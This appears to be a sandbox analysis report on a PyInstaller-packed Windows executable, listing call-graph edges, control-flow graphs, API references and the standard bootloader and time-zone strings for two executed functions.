API calls 56339->56475 56342 7ff69f3e33ae 56341->56342 56343 7ff69f3e33bf 56342->56343 56538 7ff69f3e8180 FreeLibrary 56342->56538 56373 7ff69f3e6780 FreeLibrary 56343->56373 56345->56172 56346->56155 56348 7ff69f3e76c4 56347->56348 56349 7ff69f3ef9f4 73 API calls 56348->56349 56354 7ff69f3e779b __vcrt_freefls 56348->56354 56350 7ff69f3e76e0 56349->56350 56350->56354 56539 7ff69f3f6bd8 56350->56539 56352 7ff69f3ef9f4 73 API calls 56355 7ff69f3e76f5 56352->56355 56353 7ff69f3ef6bc _fread_nolock 53 API calls 56353->56355 56354->56154 56355->56352 56355->56353 56355->56354 56356->56155 56357->56155 56358->56183 56359->56192 56360->56167 56362 7ff69f3e1bf0 49 API calls 56361->56362 56363 7ff69f3e4010 56362->56363 56363->56190 56364->56198 56365->56200 56366->56204 56367->56208 56368->56217 56369->56220 56370->56202 56371->56215 56373->56214 56374->56256 56375->56256 56377 7ff69f3e33ec GetModuleFileNameW 56376->56377 56377->56260 56377->56261 56379 7ff69f3e85f2 56378->56379 56380 7ff69f3e85df FindClose 56378->56380 56381 7ff69f3eb870 _log10_special 8 API calls 56379->56381 56380->56379 56382 7ff69f3e3442 56381->56382 56382->56265 56382->56266 56383->56278 56384->56270 56385->56277 56386->56273 56387->56278 56388->56295 56389->56295 56390->56295 56391->56295 56392->56295 56393->56317 56394->56295 56395->56329 56397 7ff69f3e5b05 56396->56397 56398 7ff69f3e1bf0 49 API calls 56397->56398 56399 7ff69f3e5b41 56398->56399 56400 7ff69f3e5b4a 56399->56400 56401 7ff69f3e5b6d 56399->56401 56486 7ff69f3e25f0 53 API calls _log10_special 56400->56486 56402 7ff69f3e3fe0 49 API calls 56401->56402 56404 7ff69f3e5b85 56402->56404 56406 7ff69f3e5ba3 56404->56406 56487 7ff69f3e25f0 53 API calls _log10_special 56404->56487 56405 7ff69f3e5b63 56409 7ff69f3eb870 _log10_special 8 API calls 56405->56409 56476 7ff69f3e3f10 56406->56476 56411 7ff69f3e308e 56409->56411 56411->56335 56427 7ff69f3e5c80 56411->56427 56412 7ff69f3e5bbb 56414 7ff69f3e3fe0 49 API calls 56412->56414 56415 7ff69f3e5bd4 56414->56415 56416 7ff69f3e5bf9 56415->56416 56417 7ff69f3e5bd9 56415->56417 56418 7ff69f3e81a0 3 API calls 56416->56418 56488 7ff69f3e25f0 53 API calls _log10_special 56417->56488 56420 7ff69f3e5c06 56418->56420 56421 7ff69f3e5c12 56420->56421 56422 7ff69f3e5c49 56420->56422 56423 7ff69f3e86b0 2 API calls 56421->56423 56490 7ff69f3e50b0 95 API calls 56422->56490 56425 7ff69f3e5c2a 56423->56425 56489 7ff69f3e29e0 51 API calls _log10_special 56425->56489 56491 7ff69f3e4c80 56427->56491 56429 7ff69f3e5cba 56430 7ff69f3e5cd3 56429->56430 56431 7ff69f3e5cc2 56429->56431 56498 7ff69f3e4450 56430->56498 56523 7ff69f3e25f0 53 API calls _log10_special 56431->56523 56435 7ff69f3e5cdf 56524 7ff69f3e25f0 53 API calls _log10_special 56435->56524 56436 7ff69f3e5cf0 56439 7ff69f3e5cff 56436->56439 56440 7ff69f3e5d10 56436->56440 56438 7ff69f3e5cce 56438->56337 56525 7ff69f3e25f0 53 API calls _log10_special 56439->56525 56502 7ff69f3e4700 56440->56502 56443 7ff69f3e5d2b 56444 7ff69f3e5d2f 56443->56444 56445 7ff69f3e5d40 56443->56445 56526 7ff69f3e25f0 53 API calls _log10_special 56444->56526 56447 7ff69f3e5d4f 56445->56447 56448 7ff69f3e5d60 56445->56448 56527 7ff69f3e25f0 53 API calls _log10_special 56447->56527 56509 7ff69f3e45a0 56448->56509 56452 7ff69f3e5d6f 56528 7ff69f3e25f0 53 API calls _log10_special 56452->56528 56453 7ff69f3e5d80 56455 7ff69f3e5d8f 56453->56455 56456 7ff69f3e5da0 56453->56456 56529 7ff69f3e25f0 53 API calls _log10_special 56455->56529 56458 7ff69f3e5db1 56456->56458 56460 7ff69f3e5dc2 56456->56460 56530 7ff69f3e25f0 53 API calls _log10_special 56458->56530 56463 7ff69f3e5dec 56460->56463 56531 7ff69f3f65c0 73 API calls 56460->56531 56462 7ff69f3e5dda 56532 7ff69f3f65c0 73 API calls 56462->56532 56463->56438 56533 7ff69f3e25f0 53 API calls _log10_special 56463->56533 56467 7ff69f3e5820 56466->56467 56467->56467 56468 7ff69f3e5849 56467->56468 56474 7ff69f3e5860 __vcrt_freefls 56467->56474 56537 7ff69f3e25f0 53 API calls _log10_special 56468->56537 56470 7ff69f3e5855 56470->56339 56471 7ff69f3e596b 56471->56339 56472 7ff69f3e1440 116 API calls 56472->56474 56473 7ff69f3e25f0 53 API calls 56473->56474 56474->56471 56474->56472 56474->56473 56475->56335 56477 7ff69f3e3f1a 56476->56477 56478 7ff69f3e86b0 2 API calls 56477->56478 56479 7ff69f3e3f3f 56478->56479 56480 7ff69f3eb870 _log10_special 8 API calls 56479->56480 56481 7ff69f3e3f67 56480->56481 56481->56412 56482 7ff69f3e81a0 56481->56482 56483 7ff69f3e86b0 2 API calls 56482->56483 56484 7ff69f3e81b4 LoadLibraryExW 56483->56484 56485 7ff69f3e81d3 __vcrt_freefls 56484->56485 56485->56412 56486->56405 56487->56406 56488->56405 56489->56405 56490->56405 56493 7ff69f3e4cac 56491->56493 56492 7ff69f3e4cb4 56492->56429 56493->56492 56496 7ff69f3e4e54 56493->56496 56534 7ff69f3f5db4 48 API calls 56493->56534 56494 7ff69f3e5017 __vcrt_freefls 56494->56429 56495 7ff69f3e4180 47 API calls 56495->56496 56496->56494 56496->56495 56499 7ff69f3e4480 56498->56499 56500 7ff69f3eb870 _log10_special 8 API calls 56499->56500 56501 7ff69f3e44ea 56500->56501 56501->56435 56501->56436 56503 7ff69f3e476f 56502->56503 56506 7ff69f3e471b 56502->56506 56536 7ff69f3e4300 MultiByteToWideChar MultiByteToWideChar __vcrt_freefls 56503->56536 56505 7ff69f3e477c 56505->56443 56508 7ff69f3e475a 56506->56508 56535 7ff69f3e4300 MultiByteToWideChar MultiByteToWideChar __vcrt_freefls 56506->56535 56508->56443 56510 7ff69f3e45b5 56509->56510 56511 7ff69f3e1bf0 49 API calls 56510->56511 56512 7ff69f3e4601 56511->56512 56513 7ff69f3e4687 __vcrt_freefls 56512->56513 56514 7ff69f3e1bf0 49 API calls 56512->56514 56515 7ff69f3eb870 _log10_special 8 API calls 56513->56515 56516 7ff69f3e4640 56514->56516 56517 7ff69f3e46dc 56515->56517 56516->56513 56518 7ff69f3e86b0 2 API calls 56516->56518 56517->56452 56517->56453 56519 7ff69f3e465a 56518->56519 56520 7ff69f3e86b0 2 API calls 56519->56520 56521 7ff69f3e4671 56520->56521 56522 7ff69f3e86b0 2 API calls 56521->56522 56522->56513 56523->56438 56524->56438 56525->56438 56526->56438 56527->56438 56528->56438 56529->56438 56530->56438 56531->56462 56532->56463 56533->56438 56534->56493 56535->56508 56536->56505 56537->56470 56538->56343 56540 7ff69f3f6c08 56539->56540 56543 7ff69f3f66e4 56540->56543 56542 7ff69f3f6c21 56542->56355 56544 7ff69f3f672e 56543->56544 56545 7ff69f3f66ff 56543->56545 56553 7ff69f3f477c EnterCriticalSection 56544->56553 56554 7ff69f3f9b24 37 API calls 2 library calls 56545->56554 56548 7ff69f3f6733 56550 7ff69f3f6750 38 API calls 56548->56550 56549 7ff69f3f671f 56549->56542 56551 7ff69f3f673f 56550->56551 56552 7ff69f3f4788 _fread_nolock LeaveCriticalSection 56551->56552 56552->56549 56554->56549 56555 7ff69f3fec9c 56556 7ff69f3fee8e 56555->56556 56558 7ff69f3fecde _isindst 56555->56558 56601 7ff69f3f43f4 11 API calls _get_daylight 56556->56601 56558->56556 56561 7ff69f3fed5e _isindst 56558->56561 56559 7ff69f3eb870 _log10_special 8 API calls 56560 7ff69f3feea9 56559->56560 56576 7ff69f4054a4 56561->56576 56566 7ff69f3feeba 56568 7ff69f3f9c10 _isindst 17 API calls 56566->56568 56570 7ff69f3feece 56568->56570 56573 7ff69f3fedbb 56575 7ff69f3fee7e 56573->56575 56600 7ff69f4054e8 37 API calls _isindst 56573->56600 56575->56559 56577 7ff69f4054b3 56576->56577 56578 7ff69f3fed7c 56576->56578 56602 7ff69f3ff5e8 EnterCriticalSection 56577->56602 56582 7ff69f4048a8 56578->56582 56580 7ff69f4054bb 56580->56578 56581 7ff69f405314 55 API calls 56580->56581 56581->56578 56583 7ff69f4048b1 56582->56583 56584 7ff69f3fed91 56582->56584 56603 7ff69f3f43f4 11 API calls _get_daylight 56583->56603 56584->56566 56588 7ff69f4048d8 56584->56588 56586 7ff69f4048b6 56604 7ff69f3f9bf0 37 API calls _invalid_parameter_noinfo 56586->56604 56589 7ff69f4048e1 56588->56589 56591 7ff69f3feda2 56588->56591 56605 7ff69f3f43f4 11 API calls _get_daylight 56589->56605 56591->56566 56594 7ff69f404908 56591->56594 56592 7ff69f4048e6 56606 7ff69f3f9bf0 37 API calls _invalid_parameter_noinfo 56592->56606 56595 7ff69f404911 56594->56595 56596 7ff69f3fedb3 56594->56596 56607 7ff69f3f43f4 11 API calls _get_daylight 56595->56607 56596->56566 56596->56573 56598 7ff69f404916 56608 7ff69f3f9bf0 37 API calls _invalid_parameter_noinfo 56598->56608 56600->56575 56601->56575 56603->56586 56604->56584 56605->56592 56606->56591 56607->56598 56608->56596 56609 7ff69f3f8c79 56621 7ff69f3f96e8 56609->56621 56611 7ff69f3f8c7e 56612 7ff69f3f8ca5 GetModuleHandleW 56611->56612 56613 7ff69f3f8cef 56611->56613 56612->56613 56619 7ff69f3f8cb2 56612->56619 56614 7ff69f3f8b7c 11 API calls 56613->56614 56615 7ff69f3f8d2b 56614->56615 56616 7ff69f3f8d32 56615->56616 56617 7ff69f3f8d48 11 API calls 56615->56617 56618 7ff69f3f8d44 56617->56618 56619->56613 56620 7ff69f3f8da0 GetModuleHandleExW GetProcAddress FreeLibrary 56619->56620 56620->56613 56626 7ff69f3fa460 45 API calls 3 library calls 56621->56626 56623 7ff69f3f96f1 56627 7ff69f3f9814 45 API calls __GetCurrentState 56623->56627 56626->56623 56628 7ff69f3f4938 56629 7ff69f3f4952 56628->56629 56630 7ff69f3f496f 56628->56630 56679 7ff69f3f43d4 11 API calls _get_daylight 56629->56679 56630->56629 56632 7ff69f3f4982 CreateFileW 56630->56632 56634 7ff69f3f49ec 56632->56634 56635 7ff69f3f49b6 56632->56635 56633 7ff69f3f4957 56680 7ff69f3f43f4 11 API calls _get_daylight 56633->56680 56682 7ff69f3f4f14 46 API calls 3 library calls 56634->56682 56653 7ff69f3f4a8c GetFileType 56635->56653 56639 7ff69f3f49f1 56642 7ff69f3f49f5 56639->56642 56643 7ff69f3f4a20 56639->56643 56640 7ff69f3f495f 56681 7ff69f3f9bf0 37 API calls _invalid_parameter_noinfo 56640->56681 56683 7ff69f3f4368 11 API calls 2 library calls 56642->56683 56684 7ff69f3f4cd4 56643->56684 56645 7ff69f3f49e1 CloseHandle 56649 7ff69f3f496a 56645->56649 56646 7ff69f3f49cb CloseHandle 56646->56649 56652 7ff69f3f49ff 56652->56649 56654 7ff69f3f4b97 56653->56654 56657 7ff69f3f4ada 56653->56657 56655 7ff69f3f4bc1 56654->56655 56656 7ff69f3f4b9f 56654->56656 56662 7ff69f3f4be4 PeekNamedPipe 56655->56662 56663 7ff69f3f4b82 56655->56663 56659 7ff69f3f4bb2 GetLastError 56656->56659 56660 7ff69f3f4ba3 56656->56660 56658 7ff69f3f4b06 GetFileInformationByHandle 56657->56658 56702 7ff69f3f4e10 21 API calls _fread_nolock 56657->56702 56658->56659 56661 7ff69f3f4b2f 56658->56661 56705 7ff69f3f4368 11 API calls 2 library calls 56659->56705 56704 7ff69f3f43f4 11 API calls _get_daylight 56660->56704 56666 7ff69f3f4cd4 51 API calls 56661->56666 56662->56663 56670 7ff69f3eb870 _log10_special 8 API calls 56663->56670 56669 7ff69f3f4b3a 56666->56669 56668 7ff69f3f4af4 56668->56658 56668->56663 56695 7ff69f3f4c34 56669->56695 56672 7ff69f3f49c4 56670->56672 56672->56645 56672->56646 56674 7ff69f3f4c34 10 API calls 56675 7ff69f3f4b59 56674->56675 56676 7ff69f3f4c34 10 API calls 56675->56676 56677 7ff69f3f4b6a 56676->56677 56677->56663 56703 7ff69f3f43f4 11 API calls _get_daylight 56677->56703 56679->56633 56680->56640 56681->56649 56682->56639 56683->56652 56686 7ff69f3f4cfc 56684->56686 56685 7ff69f3f4a2d 56694 7ff69f3f4e10 21 API calls _fread_nolock 56685->56694 56686->56685 56706 7ff69f3fea34 51 API calls 2 library calls 56686->56706 56688 7ff69f3f4d90 56688->56685 56707 7ff69f3fea34 51 API calls 2 library calls 56688->56707 56690 7ff69f3f4da3 56690->56685 56708 7ff69f3fea34 51 API calls 2 library calls 56690->56708 56692 7ff69f3f4db6 56692->56685 56709 7ff69f3fea34 51 API calls 2 library calls 56692->56709 56694->56652 56696 7ff69f3f4c50 56695->56696 56697 7ff69f3f4c5d FileTimeToSystemTime 56695->56697 56696->56697 56699 7ff69f3f4c58 56696->56699 56698 7ff69f3f4c71 SystemTimeToTzSpecificLocalTime 56697->56698 56697->56699 56698->56699 56700 7ff69f3eb870 _log10_special 8 API calls 56699->56700 56701 7ff69f3f4b49 56700->56701 56701->56674 56702->56668 56703->56663 56704->56663 56705->56663 56706->56688 56707->56690 56708->56692 56709->56685

                                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                                    Function 00007FF69F3E1000 Relevance: 40.6, APIs: 5, Strings: 18, Instructions: 338COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 0 7ff69f3e1000-7ff69f3e3536 call 7ff69f3ef138 call 7ff69f3ef140 call 7ff69f3ebb70 call 7ff69f3f4700 call 7ff69f3f4794 call 7ff69f3e33e0 14 7ff69f3e3544-7ff69f3e3566 call 7ff69f3e18f0 0->14 15 7ff69f3e3538-7ff69f3e353f 0->15 21 7ff69f3e356c-7ff69f3e3583 call 7ff69f3e1bf0 14->21 22 7ff69f3e3736-7ff69f3e374c call 7ff69f3e3f70 14->22 16 7ff69f3e371a-7ff69f3e3735 call 7ff69f3eb870 15->16 26 7ff69f3e3588-7ff69f3e35c1 21->26 27 7ff69f3e3785-7ff69f3e379a call 7ff69f3e25f0 22->27 28 7ff69f3e374e-7ff69f3e377b call 7ff69f3e76a0 22->28 29 7ff69f3e3653-7ff69f3e366d call 7ff69f3e7e10 26->29 30 7ff69f3e35c7-7ff69f3e35cb 26->30 44 7ff69f3e3712 27->44 41 7ff69f3e379f-7ff69f3e37be call 7ff69f3e1bf0 28->41 42 7ff69f3e377d-7ff69f3e3780 call 7ff69f3ef36c 28->42 45 7ff69f3e3695-7ff69f3e369c 29->45 46 7ff69f3e366f-7ff69f3e3675 29->46 34 7ff69f3e35cd-7ff69f3e35e5 call 7ff69f3f4560 30->34 35 7ff69f3e3638-7ff69f3e364d call 7ff69f3e18e0 30->35 54 7ff69f3e35f2-7ff69f3e360a call 7ff69f3f4560 34->54 55 7ff69f3e35e7-7ff69f3e35eb 34->55 35->29 35->30 61 7ff69f3e37c1-7ff69f3e37ca 41->61 42->27 44->16 48 7ff69f3e36a2-7ff69f3e36c0 call 7ff69f3e7e10 call 7ff69f3e7f80 45->48 49 7ff69f3e3844-7ff69f3e3863 call 7ff69f3e3e90 45->49 52 7ff69f3e3682-7ff69f3e3690 call 7ff69f3f415c 46->52 53 7ff69f3e3677-7ff69f3e3680 46->53 78 7ff69f3e380f-7ff69f3e381e call 7ff69f3e8400 48->78 79 7ff69f3e36c6-7ff69f3e36c9 48->79 69 7ff69f3e3865-7ff69f3e386f call 7ff69f3e3fe0 49->69 70 7ff69f3e3871-7ff69f3e3882 call 7ff69f3e1bf0 49->70 52->45 53->52 66 7ff69f3e360c-7ff69f3e3610 54->66 67 7ff69f3e3617-7ff69f3e362f call 7ff69f3f4560 54->67 55->54 61->61 65 7ff69f3e37cc-7ff69f3e37e9 call 7ff69f3e18f0 61->65 65->26 82 7ff69f3e37ef-7ff69f3e3800 call 7ff69f3e25f0 65->82 66->67 67->35 83 7ff69f3e3631 67->83 81 7ff69f3e3887-7ff69f3e38a1 call 7ff69f3e86b0 69->81 70->81 95 7ff69f3e3820 78->95 96 7ff69f3e382c-7ff69f3e3836 call 7ff69f3e7c40 78->96 79->78 84 7ff69f3e36cf-7ff69f3e36f6 call 7ff69f3e1bf0 79->84 91 7ff69f3e38a3 81->91 92 7ff69f3e38af-7ff69f3e38c1 SetDllDirectoryW 81->92 82->44 83->35 100 7ff69f3e3805-7ff69f3e380d call 7ff69f3f415c 84->100 101 7ff69f3e36fc-7ff69f3e3703 call 7ff69f3e25f0 84->101 91->92 98 7ff69f3e38c3-7ff69f3e38ca 92->98 99 7ff69f3e38d0-7ff69f3e38ec call 7ff69f3e6560 call 7ff69f3e6b00 92->99 95->96 96->81 109 7ff69f3e3838 96->109 98->99 103 7ff69f3e3a50-7ff69f3e3a58 98->103 118 7ff69f3e38ee-7ff69f3e38f4 99->118 119 7ff69f3e3947-7ff69f3e394a call 7ff69f3e6510 99->119 100->81 112 7ff69f3e3708-7ff69f3e370a 101->112 107 7ff69f3e3a5a-7ff69f3e3a77 PostMessageW GetMessageW 103->107 108 7ff69f3e3a7d-7ff69f3e3a92 call 7ff69f3e33d0 call 7ff69f3e3080 call 7ff69f3e33a0 103->108 107->108 129 7ff69f3e3a97-7ff69f3e3aaf call 7ff69f3e6780 call 7ff69f3e6510 108->129 109->49 112->44 121 7ff69f3e390e-7ff69f3e3918 call 7ff69f3e6970 118->121 122 7ff69f3e38f6-7ff69f3e3903 call 7ff69f3e65a0 118->122 126 7ff69f3e394f-7ff69f3e3956 119->126 132 7ff69f3e3923-7ff69f3e3931 call 7ff69f3e6cd0 121->132 133 7ff69f3e391a-7ff69f3e3921 121->133 122->121 135 7ff69f3e3905-7ff69f3e390c 122->135 126->103 131 7ff69f3e395c-7ff69f3e3966 call 7ff69f3e30e0 126->131 131->112 141 7ff69f3e396c-7ff69f3e3980 call 7ff69f3e83e0 131->141 132->126 146 7ff69f3e3933 132->146 137 7ff69f3e393a-7ff69f3e3942 call 7ff69f3e2870 call 7ff69f3e6780 133->137 135->137 137->119 151 7ff69f3e3982-7ff69f3e399f PostMessageW GetMessageW 141->151 152 7ff69f3e39a5-7ff69f3e39e8 call 7ff69f3e7f20 call 7ff69f3e7fc0 call 7ff69f3e6780 call 7ff69f3e6510 call 7ff69f3e7ec0 141->152 146->137 151->152 163 7ff69f3e39ea-7ff69f3e3a00 call 7ff69f3e81f0 call 7ff69f3e7ec0 152->163 164 7ff69f3e3a3d-7ff69f3e3a4b call 7ff69f3e18a0 152->164 163->164 171 7ff69f3e3a02-7ff69f3e3a10 163->171 164->112 172 7ff69f3e3a12-7ff69f3e3a2c call 7ff69f3e25f0 call 7ff69f3e18a0 171->172 173 7ff69f3e3a31-7ff69f3e3a38 call 7ff69f3e2870 171->173 172->112 173->164
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000012.00000002.2076226514.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076202952.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076263216.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076293890.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076293890.00007FF69F423000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076350931.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_18_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FileModuleName
                                                                                                                                                                                                                                                    • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$ERROR: failed to remove temporary directory: %s$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$MEI$PYINSTALLER_STRICT_UNPACK_MODE$Path exceeds PYI_PATH_MAX limit.$WARNING: failed to remove temporary directory: %s$_MEIPASS2$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-runtime-tmpdir
                                                                                                                                                                                                                                                    • API String ID: 514040917-585287483
                                                                                                                                                                                                                                                    • Opcode ID: 9ec6ea8b6a3cb6f7010f94a4f869db430c342aaafbaafaaf4030203bb7002039
                                                                                                                                                                                                                                                    • Instruction ID: d67c92372b211ab9e1eb9b5d42cdb38c5be6adf0d5342991c3c9c567cf20ab3e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9ec6ea8b6a3cb6f7010f94a4f869db430c342aaafbaafaaf4030203bb7002039
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 96F1AF21B0868292FB38DB21D5543F96761EF54780F8640B9DA5DCB2D7EF6CE968C380
                                                                                                                                                                                                                                                    Function 00007FF69F404F10 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 334timeCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 245 7ff69f404f10-7ff69f404f4b call 7ff69f404898 call 7ff69f4048a0 call 7ff69f404908 252 7ff69f405175-7ff69f4051c1 call 7ff69f3f9c10 call 7ff69f404898 call 7ff69f4048a0 call 7ff69f404908 245->252 253 7ff69f404f51-7ff69f404f5c call 7ff69f4048a8 245->253 280 7ff69f4052ff-7ff69f40536d call 7ff69f3f9c10 call 7ff69f400888 252->280 281 7ff69f4051c7-7ff69f4051d2 call 7ff69f4048a8 252->281 253->252 258 7ff69f404f62-7ff69f404f6c 253->258 260 7ff69f404f8e-7ff69f404f92 258->260 261 7ff69f404f6e-7ff69f404f71 258->261 264 7ff69f404f95-7ff69f404f9d 260->264 263 7ff69f404f74-7ff69f404f7f 261->263 266 7ff69f404f81-7ff69f404f88 263->266 267 7ff69f404f8a-7ff69f404f8c 263->267 264->264 268 7ff69f404f9f-7ff69f404fb2 call 7ff69f3fc90c 264->268 266->263 266->267 267->260 270 7ff69f404fbb-7ff69f404fc9 267->270 275 7ff69f404fb4-7ff69f404fb6 call 7ff69f3f9c58 268->275 276 7ff69f404fca-7ff69f404fd6 call 7ff69f3f9c58 268->276 275->270 286 7ff69f404fdd-7ff69f404fe5 276->286 299 7ff69f40536f-7ff69f405376 280->299 300 7ff69f40537b-7ff69f40537e 280->300 281->280 288 7ff69f4051d8-7ff69f4051e3 call 7ff69f4048d8 281->288 286->286 289 7ff69f404fe7-7ff69f404ff8 call 7ff69f3ff784 286->289 288->280 297 7ff69f4051e9-7ff69f40520c call 7ff69f3f9c58 GetTimeZoneInformation 288->297 289->252 298 7ff69f404ffe-7ff69f405054 call 7ff69f4097e0 * 4 call 7ff69f404e2c 289->298 312 7ff69f4052d4-7ff69f4052fe call 7ff69f404890 call 7ff69f404880 call 7ff69f404888 297->312 313 7ff69f405212-7ff69f405233 297->313 357 7ff69f405056-7ff69f40505a 298->357 305 7ff69f40540b-7ff69f40540e 299->305 302 7ff69f4053b5-7ff69f4053c8 call 7ff69f3fc90c 300->302 303 7ff69f405380 300->303 318 7ff69f4053d3-7ff69f4053ee call 7ff69f400888 302->318 319 7ff69f4053ca 302->319 307 7ff69f405383 303->307 305->307 310 7ff69f405414-7ff69f40541c call 7ff69f404f10 305->310 314 7ff69f405388-7ff69f4053b4 call 7ff69f3f9c58 call 7ff69f3eb870 307->314 315 7ff69f405383 call 7ff69f40518c 307->315 310->314 321 7ff69f405235-7ff69f40523b 313->321 322 7ff69f40523e-7ff69f405245 313->322 315->314 341 7ff69f4053f5-7ff69f405407 call 7ff69f3f9c58 318->341 342 7ff69f4053f0-7ff69f4053f3 318->342 326 7ff69f4053cc-7ff69f4053d1 call 7ff69f3f9c58 319->326 321->322 328 7ff69f405259 322->328 329 7ff69f405247-7ff69f40524f 322->329 326->303 338 7ff69f40525b-7ff69f4052cf call 7ff69f4097e0 * 4 call 7ff69f401e6c call 7ff69f405424 * 2 328->338 329->328 335 7ff69f405251-7ff69f405257 329->335 335->338 338->312 341->305 342->326 359 7ff69f405060-7ff69f405064 357->359 360 7ff69f40505c 357->360 359->357 362 7ff69f405066-7ff69f40508b call 7ff69f3f5e68 359->362 360->359 368 7ff69f40508e-7ff69f405092 362->368 370 7ff69f405094-7ff69f40509f 368->370 371 7ff69f4050a1-7ff69f4050a5 368->371 370->371 373 7ff69f4050a7-7ff69f4050ab 370->373 371->368 376 7ff69f4050ad-7ff69f4050d5 call 7ff69f3f5e68 373->376 377 7ff69f40512c-7ff69f405130 373->377 385 7ff69f4050f3-7ff69f4050f7 376->385 386 7ff69f4050d7 376->386 378 7ff69f405132-7ff69f405134 377->378 379 7ff69f405137-7ff69f405144 377->379 378->379 381 7ff69f40515f-7ff69f40516e call 7ff69f404890 call 7ff69f404880 379->381 382 7ff69f405146-7ff69f40515c call 7ff69f404e2c 379->382 381->252 382->381 385->377 389 7ff69f4050f9-7ff69f405117 call 7ff69f3f5e68 385->389 391 7ff69f4050da-7ff69f4050e1 386->391 397 7ff69f405123-7ff69f40512a 389->397 391->385 392 7ff69f4050e3-7ff69f4050f1 391->392 392->385 392->391 397->377 398 7ff69f405119-7ff69f40511d 397->398 398->377 399 7ff69f40511f 398->399 399->397
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _get_daylight.LIBCMT ref: 00007FF69F404F55
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF69F4048A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF69F4048BC
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF69F3F9C58: RtlFreeHeap.NTDLL(?,?,?,00007FF69F402032,?,?,?,00007FF69F40206F,?,?,00000000,00007FF69F402535,?,?,?,00007FF69F402467), ref: 00007FF69F3F9C6E
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF69F3F9C58: GetLastError.KERNEL32(?,?,?,00007FF69F402032,?,?,?,00007FF69F40206F,?,?,00000000,00007FF69F402535,?,?,?,00007FF69F402467), ref: 00007FF69F3F9C78
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF69F3F9C10: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF69F3F9BEF,?,?,?,?,?,00007FF69F3F9ADA), ref: 00007FF69F3F9C19
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF69F3F9C10: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF69F3F9BEF,?,?,?,?,?,00007FF69F3F9ADA), ref: 00007FF69F3F9C3E
                                                                                                                                                                                                                                                    • _get_daylight.LIBCMT ref: 00007FF69F404F44
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF69F404908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF69F40491C
                                                                                                                                                                                                                                                    • _get_daylight.LIBCMT ref: 00007FF69F4051BA
                                                                                                                                                                                                                                                    • _get_daylight.LIBCMT ref: 00007FF69F4051CB
                                                                                                                                                                                                                                                    • _get_daylight.LIBCMT ref: 00007FF69F4051DC
                                                                                                                                                                                                                                                    • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF69F40541C), ref: 00007FF69F405203
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000012.00000002.2076226514.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076202952.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076263216.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076293890.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076293890.00007FF69F423000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076350931.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_18_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                                                    • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                                                                    • API String ID: 4070488512-239921721
